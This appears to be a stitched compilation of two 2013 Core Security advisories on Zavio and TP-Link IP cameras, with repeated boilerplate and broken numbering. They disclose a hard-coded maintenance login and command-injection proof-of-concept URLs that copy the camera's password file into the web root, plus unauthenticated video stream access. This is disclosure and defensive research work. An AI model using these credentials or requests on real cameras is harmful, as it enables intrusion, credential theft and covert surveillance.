CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

A Security Bypass vulnerability exists in Zavio IP Cameras through 1.6.3 because the RTSP protocol authentication is disabled by default, which could let a malicious user obtain unauthorized access to the live video stream. Zavio IP The camera contains an authentication vulnerability.Information may be obtained. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable. *Advisory Information* Title: Zavio IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0302 Advisory URL: http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: Zavio Release mode: User release 2. *Vulnerability Information* Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78], Incorrect default permissions [CWE-276], OS command injection [CWE-78] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2567, CVE-2013-2568, CVE-2013-2569, CVE-2013-2570 3. [CVE-2013-2567] to bypass user web interface authentication using hard-coded credentials. 2. [CVE-2013-2568] to execute arbitrary commands from the administration web interface. This flaw can also be used to obtain all credentials of registered users. 3. [CVE-2013-2569] to access the camera video stream. 4. [CVE-2013-2570] to execute arbitrary commands from the administration web interface (post authentication only). 4. *Vulnerable Packages* . 5. *Non-Vulnerable Packages* . Vendor did not provide details. Contact Zavio for further information. 6. *Vendor Information, Solutions and Workarounds* There was no official answer from Zavio after several attempts to report these vulnerabilities (see [Sec. 9]). Contact vendor for further information. Some mitigation actions may be: . Do not expose the camera to Internet unless absolutely necessary. Enable RTSP authentication. Have at least one proxy filtering HTTP requests to 'manufacture.cgi' and 'wireless_mft.cgi'. Check the parameter 'General.Time.NTP.Server' in requests to '/opt/cgi/view/param'. 7. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2567] Zavio IP cameras use the Boa web server [3], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside: /----- # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam -----/ This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/': 1. 'manufacture.cgi' 2. 'wireless_mft.cgi' The last file contains the OS command injection showed in the following section. 8.2. *OS Command Injection* [CVE-2013-2568] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section: /----- username: manufacture password: erutcafunam -----/ The following proof of concept copies the file where the user credentials are stored in the web server root directory: /----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/ Afterwards, the user credentials can be obtained by requesting: /----- http://192.168.1.100/credenciales -----/ 8.3. *RTSP Authentication Disabled by Default* [CVE-2013-2569] The RTSP protocol authentication is disabled by default. Therefore, the live video stream can be accessed by a remote unauthenticated attacker by requesting: /----- rtsp://192.168.1.100/video.h264 -----/ 8.4. *OS Command Injection (Post-auth)* [CVE-2013-2570] The command injection is located in the function 'sub_C8C8' of the binary '/opt/cgi/view/param'. The vulnerable parameter is 'General.Time.NTP.Server'. The following proof of concept can be used to obtain the complete list of access points by executing '/sbin/awpriv ra0 get_site_survey': /----- http://192.168.1.100/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off -----/ 9. *Report Timeline* . 2013-03-19: Core Security Technologies notifies the Zavio Tech Support and requests a security manager to send a draft report regarding these vulnerabilities. No reply received. 2013-05-02: Core asks Zavio Tech Support for a security manager to send a confidential report. 2013-05-09: Core asks for a reply. 2013-05-14: Core asks for a reply. 2013-05-21: Core tries to contact vendor for last time without any reply. 2013-05-28: After 5 failed attempts to report the issues, the advisory CORE-2013-0302 is published as 'user-release'. 10. *References* [1] http://www.zavio.com/product.php?id=25. [2] http://zavio.com/product.php?id=23. [3] http://www.boa.org/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

A Security Bypass vulnerability exists in TP-LINK IP Cameras TL-SC 3130, TL-SC 3130G, 3171G, 4171G, and 3130 1.6.18P12 due to default hard-coded credentials for the administrative Web interface, which could let a malicious user obtain unauthorized access to CGI files. plural TP-Link IP Camera The product contains a vulnerability involving the use of hard-coded credentials.Information may be obtained. TP-Link IP Cameras is an IP camera device. Multiple TP-Link IP Cameras devices use the default account with a username of 'manufacture' and a password of 'erutcafunam', allowing remote attackers to use this account information to gain unauthorized access to the device. An attacker can leverage this issue to gain access to the vulnerable device. Proof-of-concept code that exploits the vulnerability is publicly available. Administrators are advised to implement an intrusion prevention system (IPS) or intrusion detection system (IDS) to help detect and prevent attacks that attempt to exploit this vulnerability. TP-Link has released beta versions that fix this vulnerability. Administrators are advised to contact the vendor for future updates. Core Security - Corelabs Advisory http://corelabs.coresecurity.com TP-Link IP Cameras Multiple Vulnerabilities 1. *Advisory Information* Title: TP-Link IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0318 Advisory URL: http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: TP-Link Release mode: Coordinated release 2. *Vulnerability Information* Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2572, CVE-2013-2573 3. *Vulnerability Description* Multiple vulnerabilities have been found in TP-Link IP cameras based on firmware v1.6.18P12 and below, that could allow an unauthenticated remote attacker: 1. 2. [CVE-2013-2573] to execute arbitrary commands from the administration web interface. This flaw can also be used to obtain all credentials of registered users. 4. Tests and PoC were run on: . TL-SC 3130 [CVE-2013-2572] works with this device only . TL-SC 3130G . TL-SC 3171G . TL-SC 4171G Other TP-Link cameras and firmware versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* Vendor provides the links to patched firmware versions. This software is *beta*, TP-Link will release the final versions with release notes and some new functions and fixes in the following days. http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip 6. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. 'boa.conf' is the Boa configuration file, and the following account can be found inside: /----- # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam -----/ This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/': 1. 'manufacture.cgi' 2. 'wireless_mft.cgi' The last file contains the OS command injection showed in the following section. 7.2. *OS Command Injection in wireless_mft.cgi* [CVE-2013-2573] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section: /----- username: manufacture password: erutcafunam -----/ The following proof of concept copies the file where the user credentials are stored in the web server root directory: /----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/ Afterwards, the user credentials can be obtained by requesting: /----- http://192.168.1.100/credenciales -----/ 8. *Report Timeline* . 2013-04-29: Core Security Technologies notifies the TP-Link Customer Support of the vulnerabilities. Publication date is set for May 28th, 2013. 2013-04-30: TP-Link team asks for a report with technical information. 2013-05-02: Technical details sent to TP-Link. 2013-05-12: Vendor notifies that a new firmware will be released around May 20th. 2013-05-16: Core asks vendor if they are ready for coordinated public disclosure on May 20th. 2013-05-17: Vendor notifies that they have fixed the firmware but the testing process won't be ready before May 24th. 2013-05-20: Core notifies that the advisory publication was re-scheduled for Monday 27th. 2013-05-23: Vendor sends a copy of the beta firmware in order to confirm if issues were fixed. 2013-05-27: Vendor notifies that consumers are able to download the Beta firmware from TP-Link website. The final release will be made public in the following days, and will increase some new functions. 2013-05-28: Advisory CORE-2013-0318 published. 9. *References* [1] http://www.boa.org/. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc